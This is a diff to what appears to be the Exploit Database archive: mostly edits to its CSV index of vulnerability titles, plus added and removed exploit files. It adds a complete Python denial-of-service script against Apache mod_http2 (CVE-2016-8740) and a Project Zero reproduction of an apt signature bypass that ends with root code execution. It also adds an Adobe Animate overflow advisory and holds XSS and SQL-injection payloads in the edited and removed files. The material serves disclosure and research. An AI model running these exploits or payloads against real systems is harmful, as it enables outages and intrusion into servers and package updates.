 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0
 24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0
 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0
-24088,platforms/php/webapps/24088.txt,"PHPX 3.x - admin/page.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
+24088,platforms/php/webapps/24088.txt,"PHPX 3.x - 'page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
-24089,platforms/php/webapps/24089.txt,"PHPX 3.x - admin/news.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
+24089,platforms/php/webapps/24089.txt,"PHPX 3.x - 'news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
-24090,platforms/php/webapps/24090.txt,"PHPX 3.x - admin/user.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
+24090,platforms/php/webapps/24090.txt,"PHPX 3.x - 'user.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
-24091,platforms/php/webapps/24091.txt,"PHPX 3.x - admin/images.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
+24091,platforms/php/webapps/24091.txt,"PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
-24092,platforms/php/webapps/24092.txt,"PHPX 3.x - admin/forums.php Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
+24092,platforms/php/webapps/24092.txt,"PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0
 24094,platforms/cgi/webapps/24094.txt,"SurgeLDAP 1.0 - Web Administration Authentication Bypass",2004-05-05,"GSS IT",cgi,webapps,0
 24099,platforms/php/webapps/24099.txt,"Adam Webb NukeJokes 1.7/2.0 Module - Multiple Parameter Cross-Site Scripting",2004-05-08,"Janek Vind",php,webapps,0
 24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - modules.php jokeid Parameter SQL Injection",2004-05-08,"Janek Vind",php,webapps,0
@@ -29672,7 +29674,7 @@ id,file,description,date,author,platform,type,port
 28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
-28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
+28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0
 28440,platforms/php/webapps/28440.txt,"ModuleBased CMS - Multiple Remote File Inclusion",2006-08-29,sCORPINo,php,webapps,0
@@ -30639,9 +30641,9 @@ id,file,description,date,author,platform,type,port
 29705,platforms/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - register.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,CorryL,php,webapps,0
 29709,platforms/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80
 30368,platforms/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - admin/edituser.php userid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
-30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
+30369,platforms/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
-30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
+30370,platforms/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps,0
-30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0
+30371,platforms/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection",2007-07-23,Lostmon,php,webapps,0
 29715,platforms/php/webapps/29715.txt,"EPortfolio 1.0 - Client Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps,0
 29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps,0
 29726,platforms/asp/webapps/29726.pl,"Duyuru Scripti - Goster.asp SQL Injection",2007-03-09,Cr@zy_King,asp,webapps,0
@@ -30662,11 +30664,11 @@ id,file,description,date,author,platform,type,port
 29751,platforms/php/webapps/29751.php,"phpStats 0.1.9 - PHP-Stats-options.php Remote Code Execution",2007-03-17,rgod,php,webapps,0
 29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps,0
 29755,platforms/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps,0
-29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
+29756,platforms/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
-29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
+29757,platforms/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
-29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - users.php user_id Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
+29758,platforms/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
-29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - news.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
+29759,platforms/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
-29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - gallery.php Multiple Parameter SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
+29760,platforms/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps,0
 29761,platforms/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - Login Parameter Local File Inclusion / Authentication Bypass Vulnerabilities",2007-03-19,"Chris Travers",cgi,webapps,0
 29762,platforms/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps,0
 29763,platforms/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps,0
@@ -32268,14 +32270,14 @@ id,file,description,date,author,platform,type,port
 32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting",2008-09-03,C1c4Tr1Z,php,webapps,0
 32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",php,webapps,0
-32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - activities/some.php title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
-32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - companies/some.php company_name Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
-32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - contacts/some.php last_name Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - 'last_name' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
-32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - campaigns/some.php campaign_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - 'campaign_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
-32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - opportunities/some.php opportunity_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - 'opportunity_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
-32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - cases/some.php case_title Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - 'case_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
-32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - files/some.php file_id Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - 'file_id' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
-32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - reports/custom/mileage.php starting Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
+32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - 'starting' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0
 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0
 32331,platforms/php/webapps/32331.txt,"Joomla! Component AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0
 32334,platforms/php/webapps/32334.txt,"CeleronDude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0
@@ -33310,7 +33312,6 @@ id,file,description,date,author,platform,type,port
 34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 - 'Slideshow.js.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
 34266,platforms/php/webapps/34266.txt,"RunCMS 2.1 - 'check.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
 34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
-34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 - 'install1.php' Cross-Site Scripting",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80
 34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
 34277,platforms/php/webapps/34277.txt,"Feng Office - Persistent Cross-Site Scripting",2014-08-06,"Juan Sacco",php,webapps,0
@@ -36873,4 +36874,4 @@ id,file,description,date,author,platform,type,port
 40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
 40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
 40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
-40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80
+40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' Parameter SQL Injection",2016-12-13,"Elar Lang",php,webapps,80

platforms/linux/dos/40909.py

@@ -0,0 +1,45 @@
+#!/usr/bin/python
+
+""" source : http://seclists.org/bugtraq/2016/Dec/3
+The mod_http2 module in the Apache HTTP Server 2.4.17 through 2.4.23, when the Protocols configuration includes h2 or h2c, does not restrict request-header length, which allows remote attackers to cause a denial of service (memory consumption) via crafted CONTINUATION frames in an HTTP/2 request.(https://access.redhat.com/security/cve/cve-2016-8740)
+
+Usage : cve-2016-8740.py [HOST] [PORT]
+"""
+
+import sys
+import struct
+import socket
+
+HOST = sys.argv[1]
+PORT = int(sys.argv[2])
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((HOST, PORT))
+
+# https://http2.github.io/http2-spec/#ConnectionHeader
+s.sendall('PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n')
+
+# https://http2.github.io/http2-spec/#SETTINGS
+SETTINGS = struct.pack('3B', 0x00, 0x00, 0x00) # Length
+SETTINGS += struct.pack('B', 0x04) # Type
+SETTINGS += struct.pack('B', 0x00)
+SETTINGS += struct.pack('>I', 0x00000000)
+s.sendall(SETTINGS)
+
+# https://http2.github.io/http2-spec/#HEADERS
+HEADER_BLOCK_FRAME = '\x82\x84\x86\x41\x86\xa0\xe4\x1d\x13\x9d\x09\x7a\x88\x25\xb6\x50\xc3\xab\xb6\x15\xc1\x53\x03\x2a\x2f\x2a\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76'
+HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length
+HEADERS += struct.pack('B', 0x01) # Type
+HEADERS += struct.pack('B', 0x00) # Flags
+HEADERS += struct.pack('>I', 0x00000001) # Stream ID
+s.sendall(HEADERS + HEADER_BLOCK_FRAME)
+
+# Sending CONTINUATION frames for leaking memory
+# https://http2.github.io/http2-spec/#CONTINUATION
+while True:
+    HEADER_BLOCK_FRAME = '\x40\x83\x18\xc6\x3f\x04\x76\x76\x76\x76'
+    HEADERS = struct.pack('>I', len(HEADER_BLOCK_FRAME))[1:] # Length
+    HEADERS += struct.pack('B', 0x09) # Type
+    HEADERS += struct.pack('B', 0x01) # Flags
+    HEADERS += struct.pack('>I', 0x00000001) # Stream ID
+    s.sendall(HEADERS + HEADER_BLOCK_FRAME)

platforms/linux/remote/40916.txt

@@ -0,0 +1,184 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1020
+
+== Vulnerability ==
+When apt-get updates a repository that uses an InRelease file (clearsigned
+Release files), this file is processed as follows:
+First, the InRelease file is downloaded to disk.
+In a subprocess running the gpgv helper, "apt-key verify" (with some more
+arguments) is executed through the following callchain:
+
+gpgv.cc:main -> pkgAcqMethod::Run -> GPGVMethod::URIAcquire
+  -> GPGVMethod::VerifyGetSigners -> ExecGPGV
+
+ExecGPGV() splits the clearsigned file into payload and signature using
+SplitClearSignedFile(), calls apt-key on these two files to perform the
+cryptographic signature verification, then discards the split files and only
+retains the clearsigned original. SplitClearSignedFile() ignores leading and
+trailing garbage.
+
+Afterwards, in the parent process, the InRelease file has to be loaded again
+so that its payload can be processed. At this point, the code
+isn't aware anymore whether the Release file was clearsigned or
+split-signed, so the file is opened using OpenMaybeClearSignedFile(), which
+first attempts to parse the file as a clearsigned (InRelease) file and extract
+the payload, then falls back to treating the file as the file as a split-signed
+(Release) file if the file format couldn't be recognized.
+
+The weakness here is: If an attacker can create an InRelease file that
+is parsed as a proper split-signed file during signature validation, but then
+isn't recognized by OpenMaybeClearSignedFile(), the "leading garbage" that was
+ignored by the signature validation is interpreted as repository metadata,
+bypassing the signing scheme.
+
+It first looks as if it would be impossible to create a file that is recognized
+as split-signed by ExecGPGV(), but isn't recognized by
+OpenMaybeClearSignedFile(), because both use the same function,
+SplitClearSignedFile(), for parsing the file. However, multiple executions of
+SplitClearSignedFile() on the same data can actually have different non-error
+results because of a bug.
+SplitClearSignedFile() uses getline() to parse the input file. A return code
+of -1, which signals that either EOF or an error occured, is always treated
+as EOF. The Linux manpage only lists EINVAL (caused by bad arguments) as
+possible error code, but because the function allocates (nearly) unbounded
+amounts of memory, it can actually also fail with ENOMEM if it runs out of
+memory.
+Therefore, if an attacker can cause the address space in the main apt-get
+process to be sufficiently constrained to prevent allocation of a large line
+buffer while the address space of the gpgv helper process is less constrained
+and permits the allocation of a buffer with the same size, the attacker can use
+this to fake an end-of-file condition in SplitClearSignedFile() that causes the
+file to be parsed as a normal Release file.
+
+A very crude way to cause such a constraint on a 32-bit machine is based on
+abusing ASLR. Because ASLR randomizes the address space after each execve(),
+thereby altering how much contiguous virtual memory is available, an allocation
+that attempts to use the average available virtual memory should ideally succeed
+50% of the time, resulting in an upper limit of 25% for the success rate of the
+whole attack. (That's not very effective, and a real attacker would likely want
+a much higher success rate, but it works for a proof of concept.)
+This is not necessarily a limitation of the vulnerability, just a limitation
+of the way the exploit is designed.
+
+I think that it would make sense to fix this as follows:
+ - Set errno to 0 before calling getline(), verify that it's still 0 after
+   returning -1, treat it as an error if errno isn't 0 anymore.
+ - Consider splitting the InRelease file only once, before signature validation,
+   and then deleting the original clearsigned file instead of the payload file.
+   This would get rid of the weakness that the file is parsed twice and parsing
+   differences can have security consequences, which is a pretty brittle design.
+ - I'm not sure whether this bug would have been exploitable if the parser for
+   split files or the parser for Release files had been stricter. You might want
+   to consider whether you could harden this code that way.
+
+
+
+== Reproduction instructions ==
+These steps are probably more detailed than necessary.
+
+First, prepare a clean Debian VM for the victim:
+
+ - download debian-8.6.0-i386-netinst.iso (it is important that this
+   is i386 and not amd64)
+ - install Virtualbox (I'm using version 4.6.36 from Ubuntu)
+ - create a new VM with the following properties:
+  - type "Linux", version "Debian (32-bit)"
+  - 8192 MB RAM (this probably doesn't matter much, especially
+    if you enable swap)
+  - create a new virtual harddrive, size 20GB (also doesn't matter much)
+ - launch the VM, insert the CD
+ - pick graphical install
+ - in the installer, use defaults everywhere, apart from enabling Xfce
+   in the software selection
+
+After installation has finished, log in, launch a terminal,
+"sudo nano /etc/apt/sources.list", change the "deb" line for jessie-updates
+so that it points to some unused port on the host machine instead of
+the proper mirror
+("deb http://192.168.0.2:1337/debian/ jessie-updates main" or so).
+This simulates a MITM attack or compromised mirror.
+
+On the host (as the attacker):
+
+
+$ tar xvf apt_sig_bypass.tar 
+apt_sig_bypass/
+apt_sig_bypass/debian/
+apt_sig_bypass/debian/netcat-evil.deb
+apt_sig_bypass/debian/dists/
+apt_sig_bypass/debian/dists/jessie-updates/
+apt_sig_bypass/debian/dists/jessie-updates/InRelease.part1
+apt_sig_bypass/debian/dists/jessie-updates/main/
+apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/
+apt_sig_bypass/debian/dists/jessie-updates/main/binary-i386/Packages
+apt_sig_bypass/make_inrelease.py
+$ cd apt_sig_bypass/
+$ curl --output debian/dists/jessie-updates/InRelease.part2 http://ftp.us.debian.org/debian/dists/jessie-updates/InRelease
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100  141k  100  141k    0     0   243k      0 --:--:-- --:--:-- --:--:--  243k
+$ ./make_inrelease.py 
+$ ls -lh debian/dists/jessie-updates/InRelease
+-rw-r--r-- 1 user user 1.3G Dec  5 17:13 debian/dists/jessie-updates/InRelease
+$ python -m SimpleHTTPServer 1337 .
+Serving HTTP on 0.0.0.0 port 1337 ...
+
+
+Now, in the VM, as root, run "apt-get update".
+It will probably fail - run it again until it doesn't fail anymore.
+The errors that can occur are "Clearsigned file isn't valid" (when the
+allocation during gpg verification fails) and some message about
+a hash mismatch (when both allocations succeed). After "apt-get update"
+has succeeded, run "apt-get upgrade" and confirm the upgrade. The result should
+look like this (server IP censored, irrelevant output removed and marked with
+"[...]"):
+
+root@debian:/home/user# apt-get update
+Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB]
+[...]
+Hit http://ftp.us.debian.org jessie-updates InRelease
+[...]
+100% [1 InRelease gpgv 1,342 MB]                                                       28.6 MB/s 0sSplitting up /var/lib/apt/lists/partial/{{{SERVERIP}}}:1337_debian_dists_jessie-updates_InRelease intIgn http://{{{SERVERIP}}}:1337 jessie-updates InRelease
+E: GPG error: http://{{{SERVERIP}}}:1337 jessie-updates InRelease: Clearsigned file isn't valid, got 'NODATA' (does the network require authentication?)
+
+root@debian:/home/user# apt-get update
+[...]
+Get:1 http://{{{SERVERIP}}}:1337 jessie-updates InRelease [1,342 MB]
+[...]
+Hit http://ftp.us.debian.org jessie-updates InRelease
+Get:4 http://{{{SERVERIP}}}:1337 jessie-updates/main i386 Packages [170 B]
+[...]
+Fetched 1,349 MB in 55s (24.4 MB/s)
+Reading package lists... Done
+
+root@debian:/home/user# apt-get upgrade
+Reading package lists... Done
+Building dependency tree
+Reading state information... Done
+Calculating upgrade... Done
+The following packages will be upgraded:
+  netcat-traditional
+1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
+Need to get 666 B of archives.
+After this operation, 109 kB disk space will be freed.
+Do you want to continue? [Y/n]
+Get:1 http://{{{SERVERIP}}}:1337/debian/ jessie-updates/main netcat-traditional i386 9000 [666 B]
+Fetched 666 B in 0s (0 B/s)
+Reading changelogs... Done
+dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5 package 'netcat-traditional':
+ missing description
+dpkg: warning: parsing file '/var/lib/dpkg/tmp.ci/control' near line 5 package 'netcat-traditional':
+ missing maintainer
+(Reading database ... 86469 files and directories currently installed.)
+Preparing to unpack .../netcat-traditional_9000_i386.deb ...
+arbitrary code execution reached
+uid=0(root) gid=0(root) groups=0(root)
+[...]
+
+As you can see, if the attacker gets lucky with the ASLR randomization, there
+are no security warnings and "apt-get upgrade" simply installs the malicious
+version of the package. (The dpkg warnings are just because I created a minimal
+package file, without some of the usual information.)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40916.zip

platforms/php/webapps/22384.txt

@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/7140/info
-
-It has been reported that Siteframe does not sufficiently filter user supplied URI parameters on Siteframe pages. 
-
-As a result of this deficiency, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of a legitimate user. All code will be executed within the context of the website running Siteframe. 
-
-This may allow for theft of cookie-based authentication credentials and other attacks.
-
-This vulnerability was reported to affect Siteframe version 2.2.4, it is not currently known if other versions are affected.
-
-http://www.example.com/search.php?searchfor="><script>alert('test');</script>

platforms/php/webapps/34269.txt

@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/41456/info
-
-Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
-
-Pligg 1.0.4 is vulnerable; other versions may also be affected. 
-
-http://www.example.com/install/install1.php?language=%22%20onmouseover=alert()%3E
-http://www.example.com/install/install1.php?language=%22%20style=a:b;margin-top:-1000px;margin-left:-100px;width:4000px;height:4000px;display:block;%20onmouseover=alert%28String.fromCharCode%2888,83,83%29%29;%3E
-

platforms/php/webapps/5975.txt

@@ -86,12 +86,12 @@ REPLY:
 <tr><td colspan="3" class="spacer6"></td></tr>
 <tr><td></td><td></td><td align="right">
 <span class="f10pxgrey">Category : <a class="std" 
-href="?mode=viewcat&amp;cat_id=1">
+href="?mode=viewcat&cat_id=1">
 [SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN 
 PASSWORD]</a>
 Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif" 
 alt="" />
-<a class="std" href="?mode=viewid&amp;post_id=1">Comments</a>[1] |
+<a class="std" href="?mode=viewid&post_id=1">Comments</a>[1] |
 <img src="./templates/aura/images/trackback.gif" />
 
 SQL Injection Vulnerability 2:
@@ -105,7 +105,7 @@ http://somedomain.com/file.html:
 http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit" 
 method="POST"> <input type="hidden" name="post_id" value="-1' UNION 
 SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`), 
-'&lt;/textarea&gt;<script>alert(document.post.subject.value)</script>', 5,6,7 
+'</textarea><script>alert(document.post.subject.value)</script>', 5,6,7 
 FROM `mb_user`#">
 </form>
 </body>

platforms/windows/dos/40915.txt

@@ -0,0 +1,133 @@
+[+] Credits: John Page aka hyp3rlinx
+
+[+] Website: hyp3rlinx.altervista.org
+
+[+] Source: http://hyp3rlinx.altervista.org/advisories/ADOBE-ANIMATE-MEMORY-CORRUPTION-VULNERABILITY.txt
+
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+=============
+www.adobe.com
+
+
+
+Product(s):
+=============================
+Adobe Animate
+15.2.1.95 and earlier versions
+
+Adobe Animate (formerly Adobe Flash Professional, Macromedia Flash, and
+FutureSplash Animator) is a multimedia authoring and computer
+animation program developed by Adobe Systems.
+
+
+
+Platforms:
+===================
+Windows / Macintosh
+
+
+
+Vulnerability Type:
+=======================================
+Critical Memory Corruption Vulnerability
+
+
+
+CVE Reference:
+==============
+CVE-2016-7866
+APSB16-38
+
+
+
+Vulnerability Details:
+=====================
+Adobe Animate suffers from a Buffer Overflow when creating .FLA files with
+ActionScript Classes that use overly long Class names.
+This causes memory corruption leading to possible arbitrary code execution
+upon opening a maliciously created .Fla Flash file.
+
+
+Reproduction / POC:
+
+
+1) Create FLA with overly long Class name in FLA Class publish properties
+input field.
+2) Save and close
+3) Reopen FLA, click edit to open the .as script file
+4) "ctrl + s" to save then boom.... access violation
+
+
+Distributed:
+Create new ".as" ActionScript 3 (AS3) file and give it very long class name
+in input field then hit "Ctrl+s" to save..
+you will crash IDE, next way described is ONE way how attackers can
+distribute malicious .FLA
+
+Abusing JSFL, The Flash JavaScript application programming interface
+(JavaScript API or JSAPI).
+
+1) Create following .JSFL file
+
+fl.getDocumentDOM().save();
+fl.getDocumentDOM().testMovie();
+
+2)  Create a MovieClip stored in FLA library with a very long class name
+that extends MovieClip and export
+   it for ActionScript etc...
+
+
+3) Drag the MovieClip to the stage
+
+
+4) Bundle FLA/JSFL file, make avail for download as example on how to use
+JSFL to call save() / publish() functions.
+
+
+User opens .FLA, runs harmless looking JSFL code then BOOM!
+
+
+
+Reference:
+https://helpx.adobe.com/security/products/animate/apsb16-38.html
+
+
+
+
+Disclosure Timeline:
+=====================================
+Vendor Notification: May 28, 2016
+December 13, 2016  : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Local
+
+
+
+
+Severity Level:
+================
+High
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.